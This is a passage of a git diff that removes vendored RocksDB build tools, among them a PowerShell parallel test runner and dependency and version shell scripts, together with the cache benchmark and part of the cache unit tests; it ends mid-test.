-$RunOnly.Add("merge_test") | Out-Null
-$RunOnly.Add("stringappend_test") | Out-Null # Apparently incorrectly written
-$RunOnly.Add("backupable_db_test") | Out-Null # Disabled
-
-
-if($RunAll -and $SuiteRun -ne "") {
-    Write-Error "$RunAll and $SuiteRun are not compatible"
-    exit 1
-}
-
-# If running under Appveyor assume that root
-[string]$Appveyor = $Env:APPVEYOR_BUILD_FOLDER
-if($Appveyor -ne "") {
-    $RootFolder = $Appveyor
-} else {
-    $RootFolder = $PSScriptRoot -replace '\\build_tools', ''
-}
-
-$LogFolder = -Join($RootFolder, "\db_logs\")
-$BinariesFolder = -Join($RootFolder, "\build\Debug\")
-
-if($WorkFolder -eq "") {
-
-    # If TEST_TMPDIR is set use it    
-    [string]$var = $Env:TEST_TMPDIR
-    if($var -eq "") {
-        $WorkFolder = -Join($RootFolder, "\db_tests\")
-        $Env:TEST_TMPDIR = $WorkFolder
-    } else {
-        $WorkFolder = $var
-    }
-} else {
-# Override from a command line
-  $Env:TEST_TMPDIR = $WorkFolder
-}
-
-Write-Output "Root: $RootFolder, WorkFolder: $WorkFolder"
-Write-Output "BinariesFolder: $BinariesFolder, LogFolder: $LogFolder"
-
-# Create test directories in the current folder
-md -Path $WorkFolder -ErrorAction Ignore | Out-Null
-md -Path $LogFolder -ErrorAction Ignore | Out-Null
-
-
-$ExcludeCasesSet = New-Object System.Collections.Generic.HashSet[string]
-if($ExcludeCases -ne "") {
-    Write-Host "ExcludeCases: $ExcludeCases"
-    $l = $ExcludeCases -split ' '
-    ForEach($t in $l) { 
-      $ExcludeCasesSet.Add($t) | Out-Null
-    }
-}
-
-$ExcludeExesSet = New-Object System.Collections.Generic.HashSet[string]
-if($ExcludeExes -ne "") {
-    Write-Host "ExcludeExe: $ExcludeExes"
-    $l = $ExcludeExes -split ' '
-    ForEach($t in $l) { 
-      $ExcludeExesSet.Add($t) | Out-Null
-    }
-}
-
-
-# Extract the names of its tests by running db_test with --gtest_list_tests.
-# This filter removes the "#"-introduced comments, and expands to
-# fully-qualified names by changing input like this:
-#
-#   DBTest.
-#     Empty
-#     WriteEmptyBatch
-#   MultiThreaded/MultiThreadedDBTest.
-#     MultiThreaded/0  # GetParam() = 0
-#     MultiThreaded/1  # GetParam() = 1
-#
-# into this:
-#
-#   DBTest.Empty
-#   DBTest.WriteEmptyBatch
-#   MultiThreaded/MultiThreadedDBTest.MultiThreaded/0
-#   MultiThreaded/MultiThreadedDBTest.MultiThreaded/1
-#
-# Output into the parameter in a form TestName -> Log File Name
-function ExtractTestCases([string]$GTestExe, $HashTable) {
-
-    $Tests = @()
-# Run db_test to get a list of tests and store it into $a array
-    &$GTestExe --gtest_list_tests | tee -Variable Tests | Out-Null
-
-    # Current group
-    $Group=""
-
-    ForEach( $l in $Tests) {
-
-      # Leading whitespace is fine
-      $l = $l -replace '^\s+',''
-      # but no whitespace any other place
-      if($l -match "\s+") {
-        continue
-      }
-      # Trailing dot is a test group but no whitespace
-      elseif ( $l -match "\.$" ) {
-        $Group = $l
-      }  else {
-        # Otherwise it is a test name, remove leading space
-        $test = $l
-        # remove trailing comment if any and create a log name
-        $test = $test -replace '\s+\#.*',''
-        $test = "$Group$test"
-
-        if($ExcludeCasesSet.Contains($test)) {
-            Write-Warning "$test case is excluded"
-            continue
-        }
-
-        $test_log = $test -replace '[\./]','_'
-        $test_log += ".log"
-        $log_path = -join ($LogFolder, $test_log)
-
-        # Add to a hashtable
-        $HashTable.Add($test, $log_path);
-      }
-    }
-}
-
-# The function removes trailing .exe siffix if any,
-# creates a name for the log file
-# Then adds the test name if it was not excluded into
-# a HashTable in a form of test_name -> log_path
-function MakeAndAdd([string]$token, $HashTable) {
-
-    $test_name = $token -replace '.exe$', ''
-    $log_name =  -join ($test_name, ".log")
-    $log_path = -join ($LogFolder, $log_name)
-    $HashTable.Add($test_name, $log_path)
-}
-
-# This function takes a list of Suites to run
-# Lists all the test cases in each of the suite
-# and populates HashOfHashes
-# Ordered by suite(exe) @{ Exe = @{ TestCase = LogName }}
-function ProcessSuites($ListOfSuites, $HashOfHashes) {
-
-  $suite_list = $ListOfSuites
-  # Problem: if you run --gtest_list_tests on
-  # a non Google Test executable then it will start executing
-  # and we will get nowhere
-  ForEach($suite in $suite_list) {
-
-    if($RunOnly.Contains($suite)) {
-      Write-Warning "$suite is excluded from running as Google test suite"
-      continue
-    }
-
-    if($EnableJE) {
-      $suite += "_je"
-    }
-
-    $Cases = [ordered]@{}
-    $Cases.Clear()
-    $suite_exe = -Join ($BinariesFolder, $suite)
-    ExtractTestCases -GTestExe $suite_exe -HashTable $Cases
-    if($Cases.Count -gt 0) {
-      $HashOfHashes.Add($suite, $Cases);
-    }
-  }
-
-  # Make logs and run
-  if($CasesToRun.Count -lt 1) {
-     Write-Error "Failed to extract tests from $SuiteRun"
-     exit 1
-  }
-
-}
-
-# This will contain all test executables to run
-
-# Hash table that contains all non suite
-# Test executable to run
-$TestExes = [ordered]@{}
-
-# Check for test exe that are not
-# Google Test Suites
-# Since this is explicitely mentioned it is not subject
-# for exclusions
-if($Run -ne "") {
-
-  $test_list = $Run -split ' '
-
-  ForEach($t in $test_list) {
-
-    if($EnableJE) {
-      $t += "_je"
-    }
-
-    MakeAndAdd -token $t -HashTable $TestExes
-  }
-
-  if($TestExes.Count -lt 1) {
-     Write-Error "Failed to extract tests from $Run"
-     exit 1
-  }
-}
-
-# Ordered by exe @{ Exe = @{ TestCase = LogName }}
-$CasesToRun = [ordered]@{}
-
-if($SuiteRun -ne "") {
-  $suite_list = $SuiteRun -split ' '
-  ProcessSuites -ListOfSuites $suite_list -HashOfHashes $CasesToRun
-}
-
-if($RunAll) {
-# Discover all the test binaries
-  if($EnableJE) {
-    $pattern = "*_test_je.exe"
-  } else {
-    $pattern = "*_test.exe"
-  }
-
-
-  $search_path = -join ($BinariesFolder, $pattern)
-  Write-Host "Binaries Search Path: $search_path"
-
-  $ListOfExe = @()
-  dir -Path $search_path | ForEach-Object {
-     $ListOfExe += ($_.Name)     
-  }
-
-  # Exclude those in RunOnly from running as suites
-  $ListOfSuites = @()
-  ForEach($e in $ListOfExe) {
-
-    $e = $e -replace '.exe$', ''
-    $bare_name = $e -replace '_je$', ''
-
-    if($ExcludeExesSet.Contains($bare_name)) {
-      Write-Warning "Test $e is excluded"
-      continue
-    }
-
-    if($RunOnly.Contains($bare_name)) {
-      MakeAndAdd -token $e -HashTable $TestExes
-    } else {
-      $ListOfSuites += $bare_name
-    }
-  }
-
-  ProcessSuites -ListOfSuites $ListOfSuites -HashOfHashes $CasesToRun
-}
-
-
-Write-Host "Attempting to start: $NumTestsToStart tests"
-
-# Invoke a test with a filter and redirect all output
-$InvokeTestCase = {
-    param($exe, $test, $log);
-    &$exe --gtest_filter=$test > $log 2>&1
-}
-
-# Invoke all tests and redirect output
-$InvokeTestAsync = {
-    param($exe, $log)
-    &$exe > $log 2>&1
-}
-
-# Hash that contains tests to rerun if any failed
-# Those tests will be rerun sequentially
-# $Rerun = [ordered]@{}
-# Test limiting factor here
-[int]$count = 0
-# Overall status
-[bool]$success = $true;
-
-function RunJobs($Suites, $TestCmds, [int]$ConcurrencyVal)
-{
-    # Array to wait for any of the running jobs
-    $jobs = @()
-    # Hash JobToLog
-    $JobToLog = @{}
-
-    # Wait for all to finish and get the results
-    while(($JobToLog.Count -gt 0) -or
-          ($TestCmds.Count -gt 0) -or 
-           ($Suites.Count -gt 0)) {
-
-        # Make sure we have maximum concurrent jobs running if anything
-        # and the $Limit either not set or allows to proceed
-        while(($JobToLog.Count -lt $ConcurrencyVal) -and
-              ((($TestCmds.Count -gt 0) -or ($Suites.Count -gt 0)) -and
-              (($Limit -lt 0) -or ($count -lt $Limit)))) {
-
-            # We always favore suites to run if available
-            [string]$exe_name = ""
-            [string]$log_path = ""
-            $Cases = @{}
-
-            if($Suites.Count -gt 0) {
-              # Will the first one
-              ForEach($e in $Suites.Keys) {
-                $exe_name = $e
-                $Cases = $Suites[$e]
-                break
-              }
-              [string]$test_case = ""
-              [string]$log_path = ""
-              ForEach($c in $Cases.Keys) {
-                 $test_case = $c
-                 $log_path = $Cases[$c]
-                 break
-              }
-
-              Write-Host "Starting $exe_name::$test_case"
-              [string]$Exe =  -Join ($BinariesFolder, $exe_name)
-              $job = Start-Job -Name "$exe_name::$test_case" -ArgumentList @($Exe,$test_case,$log_path) -ScriptBlock $InvokeTestCase
-              $JobToLog.Add($job, $log_path)
-
-              $Cases.Remove($test_case)
-              if($Cases.Count -lt 1) {
-                $Suites.Remove($exe_name)
-              }
-
-            } elseif ($TestCmds.Count -gt 0) {
-
-               ForEach($e in $TestCmds.Keys) {
-                 $exe_name = $e
-                 $log_path = $TestCmds[$e]
-                 break
-               }
-
-              [string]$Exe =  -Join ($BinariesFolder, $exe_name)
-              $job = Start-Job -Name $exe_name -ScriptBlock $InvokeTestAsync -ArgumentList @($Exe,$log_path)
-              $JobToLog.Add($job, $log_path)
-
-              $TestCmds.Remove($exe_name)
-
-            } else {
-                Write-Error "In the job loop but nothing to run"
-                exit 1
-            }
-
-            ++$count
-        } # End of Job starting loop
-
-        if($JobToLog.Count -lt 1) {
-          break
-        }
-
-        $jobs = @()
-        foreach($k in $JobToLog.Keys) { $jobs += $k }
-
-        $completed = Wait-Job -Job $jobs -Any
-        $log = $JobToLog[$completed]
-        $JobToLog.Remove($completed)
-
-        $message = -join @($completed.Name, " State: ", ($completed.State))
-
-        $log_content = @(Get-Content $log)
-
-        if($completed.State -ne "Completed") {
-            $success = $false
-            Write-Warning $message
-            $log_content | Write-Warning
-        } else {
-            # Scan the log. If we find PASSED and no occurrence of FAILED
-            # then it is a success
-            [bool]$pass_found = $false
-            ForEach($l in $log_content) {
-
-                if(($l -match "^\[\s+FAILED") -or
-                   ($l -match "Assertion failed:")) {
-                    $pass_found = $false
-                    break
-                }
-
-                if(($l -match "^\[\s+PASSED") -or
-                   ($l -match " : PASSED$") -or
-                    ($l -match "^PASS$") -or   # Special c_test case
-                    ($l -match "Passed all tests!") ) {
-                    $pass_found = $true
-                }
-            }
-
-            if(!$pass_found) {
-                $success = $false;
-                Write-Warning $message
-                $log_content | Write-Warning
-            } else {
-                Write-Host $message
-            }
-        }
-
-        # Remove cached job info from the system
-        # Should be no output
-        Receive-Job -Job $completed | Out-Null
-    }
-}
-
-RunJobs -Suites $CasesToRun -TestCmds $TestExes -ConcurrencyVal $Concurrency
-
-$EndDate = (Get-Date)
-
-New-TimeSpan -Start $StartDate -End $EndDate | 
-  ForEach-Object { 
-    "Elapsed time: {0:g}" -f $_
-  }
-
-
-if(!$success) {
-# This does not succeed killing off jobs quick
-# So we simply exit
-#    Remove-Job -Job $jobs -Force
-# indicate failure using this exit code
-    exit 1
- }
-
- exit 0
-
- 
diff --git a/thirdparty/rocksdb/build_tools/update_dependencies.sh b/thirdparty/rocksdb/build_tools/update_dependencies.sh
deleted file mode 100755
index c7b9932..0000000
--- a/thirdparty/rocksdb/build_tools/update_dependencies.sh
+++ /dev/null
@@ -1,131 +0,0 @@
-#!/bin/sh
-#
-# Update dependencies.sh file with the latest avaliable versions
-
-BASEDIR=$(dirname $0)
-OUTPUT=""
-
-function log_variable()
-{
-  echo "$1=${!1}" >> "$OUTPUT"
-}
-
-
-TP2_LATEST="/mnt/vol/engshare/fbcode/third-party2"
-## $1 => lib name
-## $2 => lib version (if not provided, will try to pick latest)
-## $3 => platform (if not provided, will try to pick latest gcc)
-##
-## get_lib_base will set a variable named ${LIB_NAME}_BASE to the lib location
-function get_lib_base()
-{
-  local lib_name=$1
-  local lib_version=$2
-  local lib_platform=$3
-
-  local result="$TP2_LATEST/$lib_name/"
-  
-  # Lib Version
-  if [ -z "$lib_version" ] || [ "$lib_version" = "LATEST" ]; then
-    # version is not provided, use latest
-    result=`ls -dr1v $result/*/ | head -n1`
-  else
-    result="$result/$lib_version/"
-  fi
-  
-  # Lib Platform
-  if [ -z "$lib_platform" ]; then
-    # platform is not provided, use latest gcc
-    result=`ls -dr1v $result/gcc-*[^fb]/ | head -n1`
-  else
-    result="$result/$lib_platform/"
-  fi
-  
-  result=`ls -1d $result/*/ | head -n1`
-  
-  # lib_name => LIB_NAME_BASE
-  local __res_var=${lib_name^^}"_BASE"
-  __res_var=`echo $__res_var | tr - _`
-  # LIB_NAME_BASE=$result
-  eval $__res_var=`readlink -f $result`
-  
-  log_variable $__res_var
-}
-
-###########################################################
-#                   5.x dependencies                      #
-###########################################################
-
-OUTPUT="$BASEDIR/dependencies.sh"
-
-rm -f "$OUTPUT"
-touch "$OUTPUT"
-
-echo "Writing dependencies to $OUTPUT"
-
-# Compilers locations
-GCC_BASE=`readlink -f $TP2_LATEST/gcc/5.x/centos6-native/*/`
-CLANG_BASE=`readlink -f $TP2_LATEST/llvm-fb/stable/centos6-native/*/`
-
-log_variable GCC_BASE
-log_variable CLANG_BASE
-
-# Libraries locations
-get_lib_base libgcc     5.x
-get_lib_base glibc      2.23
-get_lib_base snappy     LATEST gcc-5-glibc-2.23
-get_lib_base zlib       LATEST
-get_lib_base bzip2      LATEST
-get_lib_base lz4        LATEST
-get_lib_base zstd       LATEST
-get_lib_base gflags     LATEST
-get_lib_base jemalloc   LATEST
-get_lib_base numa       LATEST
-get_lib_base libunwind  LATEST
-get_lib_base tbb        4.0_update2 gcc-5-glibc-2.23
-
-get_lib_base kernel-headers LATEST 
-get_lib_base binutils   LATEST centos6-native 
-get_lib_base valgrind   3.10.0 gcc-5-glibc-2.23
-get_lib_base lua        5.2.3 gcc-5-glibc-2.23
-
-git diff $OUTPUT
-
-###########################################################
-#                   4.8.1 dependencies                    #
-###########################################################
-
-OUTPUT="$BASEDIR/dependencies_4.8.1.sh"
-
-rm -f "$OUTPUT"
-touch "$OUTPUT"
-
-echo "Writing 4.8.1 dependencies to $OUTPUT"
-
-# Compilers locations
-GCC_BASE=`readlink -f $TP2_LATEST/gcc/4.8.1/centos6-native/*/`
-CLANG_BASE=`readlink -f $TP2_LATEST/llvm-fb/stable/centos6-native/*/`
-
-log_variable GCC_BASE
-log_variable CLANG_BASE
-
-# Libraries locations
-get_lib_base libgcc     4.8.1  gcc-4.8.1-glibc-2.17
-get_lib_base glibc      2.17   gcc-4.8.1-glibc-2.17  
-get_lib_base snappy     LATEST gcc-4.8.1-glibc-2.17
-get_lib_base zlib       LATEST gcc-4.8.1-glibc-2.17
-get_lib_base bzip2      LATEST gcc-4.8.1-glibc-2.17
-get_lib_base lz4        LATEST gcc-4.8.1-glibc-2.17
-get_lib_base zstd       LATEST gcc-4.8.1-glibc-2.17
-get_lib_base gflags     LATEST gcc-4.8.1-glibc-2.17
-get_lib_base jemalloc   LATEST gcc-4.8.1-glibc-2.17
-get_lib_base numa       LATEST gcc-4.8.1-glibc-2.17
-get_lib_base libunwind  LATEST gcc-4.8.1-glibc-2.17
-get_lib_base tbb        4.0_update2 gcc-4.8.1-glibc-2.17
-
-get_lib_base kernel-headers LATEST gcc-4.8.1-glibc-2.17 
-get_lib_base binutils   LATEST centos6-native 
-get_lib_base valgrind   3.8.1  gcc-4.8.1-glibc-2.17
-get_lib_base lua        5.2.3 centos6-native
-
-git diff $OUTPUT
diff --git a/thirdparty/rocksdb/build_tools/version.sh b/thirdparty/rocksdb/build_tools/version.sh
deleted file mode 100755
index f3ca98c..0000000
--- a/thirdparty/rocksdb/build_tools/version.sh
+++ /dev/null
@@ -1,22 +0,0 @@
-#!/bin/sh
-if [ "$#" = "0" ]; then
-  echo "Usage: $0 major|minor|patch|full"
-  exit 1
-fi
-
-if [ "$1" = "major" ]; then
-  cat include/rocksdb/version.h  | grep MAJOR | head -n1 | awk '{print $3}'
-fi
-if [ "$1" = "minor" ]; then
-  cat include/rocksdb/version.h  | grep MINOR | head -n1 | awk '{print $3}'
-fi
-if [ "$1" = "patch" ]; then
-  cat include/rocksdb/version.h  | grep PATCH | head -n1 | awk '{print $3}'
-fi
-if [ "$1" = "full" ]; then
-  awk '/#define ROCKSDB/ { env[$2] = $3 }
-       END { printf "%s.%s.%s\n", env["ROCKSDB_MAJOR"],
-                                  env["ROCKSDB_MINOR"],
-                                  env["ROCKSDB_PATCH"] }'  \
-      include/rocksdb/version.h
-fi
diff --git a/thirdparty/rocksdb/cache/cache_bench.cc b/thirdparty/rocksdb/cache/cache_bench.cc
deleted file mode 100644
index 16c2ced..0000000
--- a/thirdparty/rocksdb/cache/cache_bench.cc
+++ /dev/null
@@ -1,284 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <inttypes.h>
-#include <sys/types.h>
-#include <stdio.h>
-#include <gflags/gflags.h>
-
-#include "rocksdb/db.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "port/port.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-
-using GFLAGS::ParseCommandLineFlags;
-
-static const uint32_t KB = 1024;
-
-DEFINE_int32(threads, 16, "Number of concurrent threads to run.");
-DEFINE_int64(cache_size, 8 * KB * KB,
-             "Number of bytes to use as a cache of uncompressed data.");
-DEFINE_int32(num_shard_bits, 4, "shard_bits.");
-
-DEFINE_int64(max_key, 1 * KB * KB * KB, "Max number of key to place in cache");
-DEFINE_uint64(ops_per_thread, 1200000, "Number of operations per thread.");
-
-DEFINE_bool(populate_cache, false, "Populate cache before operations");
-DEFINE_int32(insert_percent, 40,
-             "Ratio of insert to total workload (expressed as a percentage)");
-DEFINE_int32(lookup_percent, 50,
-             "Ratio of lookup to total workload (expressed as a percentage)");
-DEFINE_int32(erase_percent, 10,
-             "Ratio of erase to total workload (expressed as a percentage)");
-
-DEFINE_bool(use_clock_cache, false, "");
-
-namespace rocksdb {
-
-class CacheBench;
-namespace {
-void deleter(const Slice& key, void* value) {
-    delete reinterpret_cast<char *>(value);
-}
-
-// State shared by all concurrent executions of the same benchmark.
-class SharedState {
- public:
-  explicit SharedState(CacheBench* cache_bench)
-      : cv_(&mu_),
-        num_threads_(FLAGS_threads),
-        num_initialized_(0),
-        start_(false),
-        num_done_(0),
-        cache_bench_(cache_bench) {
-  }
-
-  ~SharedState() {}
-
-  port::Mutex* GetMutex() {
-    return &mu_;
-  }
-
-  port::CondVar* GetCondVar() {
-    return &cv_;
-  }
-
-  CacheBench* GetCacheBench() const {
-    return cache_bench_;
-  }
-
-  void IncInitialized() {
-    num_initialized_++;
-  }
-
-  void IncDone() {
-    num_done_++;
-  }
-
-  bool AllInitialized() const {
-    return num_initialized_ >= num_threads_;
-  }
-
-  bool AllDone() const {
-    return num_done_ >= num_threads_;
-  }
-
-  void SetStart() {
-    start_ = true;
-  }
-
-  bool Started() const {
-    return start_;
-  }
-
- private:
-  port::Mutex mu_;
-  port::CondVar cv_;
-
-  const uint64_t num_threads_;
-  uint64_t num_initialized_;
-  bool start_;
-  uint64_t num_done_;
-
-  CacheBench* cache_bench_;
-};
-
-// Per-thread state for concurrent executions of the same benchmark.
-struct ThreadState {
-  uint32_t tid;
-  Random rnd;
-  SharedState* shared;
-
-  ThreadState(uint32_t index, SharedState* _shared)
-      : tid(index), rnd(1000 + index), shared(_shared) {}
-};
-}  // namespace
-
-class CacheBench {
- public:
-  CacheBench() : num_threads_(FLAGS_threads) {
-    if (FLAGS_use_clock_cache) {
-      cache_ = NewClockCache(FLAGS_cache_size, FLAGS_num_shard_bits);
-      if (!cache_) {
-        fprintf(stderr, "Clock cache not supported.\n");
-        exit(1);
-      }
-    } else {
-      cache_ = NewLRUCache(FLAGS_cache_size, FLAGS_num_shard_bits);
-    }
-  }
-
-  ~CacheBench() {}
-
-  void PopulateCache() {
-    Random rnd(1);
-    for (int64_t i = 0; i < FLAGS_cache_size; i++) {
-      uint64_t rand_key = rnd.Next() % FLAGS_max_key;
-      // Cast uint64* to be char*, data would be copied to cache
-      Slice key(reinterpret_cast<char*>(&rand_key), 8);
-      // do insert
-      cache_->Insert(key, new char[10], 1, &deleter);
-    }
-  }
-
-  bool Run() {
-    rocksdb::Env* env = rocksdb::Env::Default();
-
-    PrintEnv();
-    SharedState shared(this);
-    std::vector<ThreadState*> threads(num_threads_);
-    for (uint32_t i = 0; i < num_threads_; i++) {
-      threads[i] = new ThreadState(i, &shared);
-      env->StartThread(ThreadBody, threads[i]);
-    }
-    {
-      MutexLock l(shared.GetMutex());
-      while (!shared.AllInitialized()) {
-        shared.GetCondVar()->Wait();
-      }
-      // Record start time
-      uint64_t start_time = env->NowMicros();
-
-      // Start all threads
-      shared.SetStart();
-      shared.GetCondVar()->SignalAll();
-
-      // Wait threads to complete
-      while (!shared.AllDone()) {
-        shared.GetCondVar()->Wait();
-      }
-
-      // Record end time
-      uint64_t end_time = env->NowMicros();
-      double elapsed = static_cast<double>(end_time - start_time) * 1e-6;
-      uint32_t qps = static_cast<uint32_t>(
-          static_cast<double>(FLAGS_threads * FLAGS_ops_per_thread) / elapsed);
-      fprintf(stdout, "Complete in %.3f s; QPS = %u\n", elapsed, qps);
-    }
-    return true;
-  }
-
- private:
-  std::shared_ptr<Cache> cache_;
-  uint32_t num_threads_;
-
-  static void ThreadBody(void* v) {
-    ThreadState* thread = reinterpret_cast<ThreadState*>(v);
-    SharedState* shared = thread->shared;
-
-    {
-      MutexLock l(shared->GetMutex());
-      shared->IncInitialized();
-      if (shared->AllInitialized()) {
-        shared->GetCondVar()->SignalAll();
-      }
-      while (!shared->Started()) {
-        shared->GetCondVar()->Wait();
-      }
-    }
-    thread->shared->GetCacheBench()->OperateCache(thread);
-
-    {
-      MutexLock l(shared->GetMutex());
-      shared->IncDone();
-      if (shared->AllDone()) {
-        shared->GetCondVar()->SignalAll();
-      }
-    }
-  }
-
-  void OperateCache(ThreadState* thread) {
-    for (uint64_t i = 0; i < FLAGS_ops_per_thread; i++) {
-      uint64_t rand_key = thread->rnd.Next() % FLAGS_max_key;
-      // Cast uint64* to be char*, data would be copied to cache
-      Slice key(reinterpret_cast<char*>(&rand_key), 8);
-      int32_t prob_op = thread->rnd.Uniform(100);
-      if (prob_op >= 0 && prob_op < FLAGS_insert_percent) {
-        // do insert
-        cache_->Insert(key, new char[10], 1, &deleter);
-      } else if (prob_op -= FLAGS_insert_percent &&
-                 prob_op < FLAGS_lookup_percent) {
-        // do lookup
-        auto handle = cache_->Lookup(key);
-        if (handle) {
-          cache_->Release(handle);
-        }
-      } else if (prob_op -= FLAGS_lookup_percent &&
-                 prob_op < FLAGS_erase_percent) {
-        // do erase
-        cache_->Erase(key);
-      }
-    }
-  }
-
-  void PrintEnv() const {
-    printf("RocksDB version     : %d.%d\n", kMajorVersion, kMinorVersion);
-    printf("Number of threads   : %d\n", FLAGS_threads);
-    printf("Ops per thread      : %" PRIu64 "\n", FLAGS_ops_per_thread);
-    printf("Cache size          : %" PRIu64 "\n", FLAGS_cache_size);
-    printf("Num shard bits      : %d\n", FLAGS_num_shard_bits);
-    printf("Max key             : %" PRIu64 "\n", FLAGS_max_key);
-    printf("Populate cache      : %d\n", FLAGS_populate_cache);
-    printf("Insert percentage   : %d%%\n", FLAGS_insert_percent);
-    printf("Lookup percentage   : %d%%\n", FLAGS_lookup_percent);
-    printf("Erase percentage    : %d%%\n", FLAGS_erase_percent);
-    printf("----------------------------\n");
-  }
-};
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  if (FLAGS_threads <= 0) {
-    fprintf(stderr, "threads number <= 0\n");
-    exit(1);
-  }
-
-  rocksdb::CacheBench bench;
-  if (FLAGS_populate_cache) {
-    bench.PopulateCache();
-  }
-  if (bench.Run()) {
-    return 0;
-  } else {
-    return 1;
-  }
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/cache/cache_test.cc b/thirdparty/rocksdb/cache/cache_test.cc
deleted file mode 100644
index 8e24122..0000000
--- a/thirdparty/rocksdb/cache/cache_test.cc
+++ /dev/null
@@ -1,703 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/cache.h"
-
-#include <forward_list>
-#include <functional>
-#include <iostream>
-#include <string>
-#include <vector>
-#include "cache/clock_cache.h"
-#include "cache/lru_cache.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-// Conversions between numeric keys/values and the types expected by Cache.
-static std::string EncodeKey(int k) {
-  std::string result;
-  PutFixed32(&result, k);
-  return result;
-}
-static int DecodeKey(const Slice& k) {
-  assert(k.size() == 4);
-  return DecodeFixed32(k.data());
-}
-static void* EncodeValue(uintptr_t v) { return reinterpret_cast<void*>(v); }
-static int DecodeValue(void* v) {
-  return static_cast<int>(reinterpret_cast<uintptr_t>(v));
-}
-
-const std::string kLRU = "lru";
-const std::string kClock = "clock";
-
-void dumbDeleter(const Slice& key, void* value) {}
-
-void eraseDeleter(const Slice& key, void* value) {
-  Cache* cache = reinterpret_cast<Cache*>(value);
-  cache->Erase("foo");
-}
-
-class CacheTest : public testing::TestWithParam<std::string> {
- public:
-  static CacheTest* current_;
-
-  static void Deleter(const Slice& key, void* v) {
-    current_->deleted_keys_.push_back(DecodeKey(key));
-    current_->deleted_values_.push_back(DecodeValue(v));
-  }
-
-  static const int kCacheSize = 1000;
-  static const int kNumShardBits = 4;
-
-  static const int kCacheSize2 = 100;
-  static const int kNumShardBits2 = 2;
-
-  std::vector<int> deleted_keys_;
-  std::vector<int> deleted_values_;
-  shared_ptr<Cache> cache_;
-  shared_ptr<Cache> cache2_;
-
-  CacheTest()
-      : cache_(NewCache(kCacheSize, kNumShardBits, false)),
-        cache2_(NewCache(kCacheSize2, kNumShardBits2, false)) {
-    current_ = this;
-  }
-
-  ~CacheTest() {
-  }
-
-  std::shared_ptr<Cache> NewCache(size_t capacity) {
-    auto type = GetParam();
-    if (type == kLRU) {
-      return NewLRUCache(capacity);
-    }
-    if (type == kClock) {
-      return NewClockCache(capacity);
-    }
-    return nullptr;
-  }
-
-  std::shared_ptr<Cache> NewCache(size_t capacity, int num_shard_bits,
-                                  bool strict_capacity_limit) {
-    auto type = GetParam();
-    if (type == kLRU) {
-      return NewLRUCache(capacity, num_shard_bits, strict_capacity_limit);
-    }
-    if (type == kClock) {
-      return NewClockCache(capacity, num_shard_bits, strict_capacity_limit);
-    }
-    return nullptr;
-  }
-
-  int Lookup(shared_ptr<Cache> cache, int key) {
-    Cache::Handle* handle = cache->Lookup(EncodeKey(key));
-    const int r = (handle == nullptr) ? -1 : DecodeValue(cache->Value(handle));
-    if (handle != nullptr) {
-      cache->Release(handle);
-    }
-    return r;
-  }
-
-  void Insert(shared_ptr<Cache> cache, int key, int value, int charge = 1) {
-    cache->Insert(EncodeKey(key), EncodeValue(value), charge,
-                  &CacheTest::Deleter);
-  }
-
-  void Erase(shared_ptr<Cache> cache, int key) {
-    cache->Erase(EncodeKey(key));
-  }
-
-
-  int Lookup(int key) {
-    return Lookup(cache_, key);
-  }
-
-  void Insert(int key, int value, int charge = 1) {
-    Insert(cache_, key, value, charge);
-  }
-
-  void Erase(int key) {
-    Erase(cache_, key);
-  }
-
-  int Lookup2(int key) {
-    return Lookup(cache2_, key);
-  }
-
-  void Insert2(int key, int value, int charge = 1) {
-    Insert(cache2_, key, value, charge);
-  }
-
-  void Erase2(int key) {
-    Erase(cache2_, key);
-  }
-};
-CacheTest* CacheTest::current_;
-
-TEST_P(CacheTest, UsageTest) {
-  // cache is shared_ptr and will be automatically cleaned up.
-  const uint64_t kCapacity = 100000;
-  auto cache = NewCache(kCapacity, 8, false);
-
-  size_t usage = 0;
-  char value[10] = "abcdef";
-  // make sure everything will be cached
-  for (int i = 1; i < 100; ++i) {
-    std::string key(i, 'a');
-    auto kv_size = key.size() + 5;
-    cache->Insert(key, reinterpret_cast<void*>(value), kv_size, dumbDeleter);
-    usage += kv_size;
-    ASSERT_EQ(usage, cache->GetUsage());
-  }
-
-  // make sure the cache will be overloaded
-  for (uint64_t i = 1; i < kCapacity; ++i) {
-    auto key = ToString(i);
-    cache->Insert(key, reinterpret_cast<void*>(value), key.size() + 5,
-                  dumbDeleter);
-  }
-
-  // the usage should be close to the capacity
-  ASSERT_GT(kCapacity, cache->GetUsage());
-  ASSERT_LT(kCapacity * 0.95, cache->GetUsage());
-}
-
-TEST_P(CacheTest, PinnedUsageTest) {
-  // cache is shared_ptr and will be automatically cleaned up.
-  const uint64_t kCapacity = 100000;
-  auto cache = NewCache(kCapacity, 8, false);
-
-  size_t pinned_usage = 0;
-  char value[10] = "abcdef";
-
-  std::forward_list<Cache::Handle*> unreleased_handles;
-
-  // Add entries. Unpin some of them after insertion. Then, pin some of them
-  // again. Check GetPinnedUsage().
-  for (int i = 1; i < 100; ++i) {
-    std::string key(i, 'a');
-    auto kv_size = key.size() + 5;
-    Cache::Handle* handle;
-    cache->Insert(key, reinterpret_cast<void*>(value), kv_size, dumbDeleter,
-                  &handle);
-    pinned_usage += kv_size;
-    ASSERT_EQ(pinned_usage, cache->GetPinnedUsage());
-    if (i % 2 == 0) {
-      cache->Release(handle);
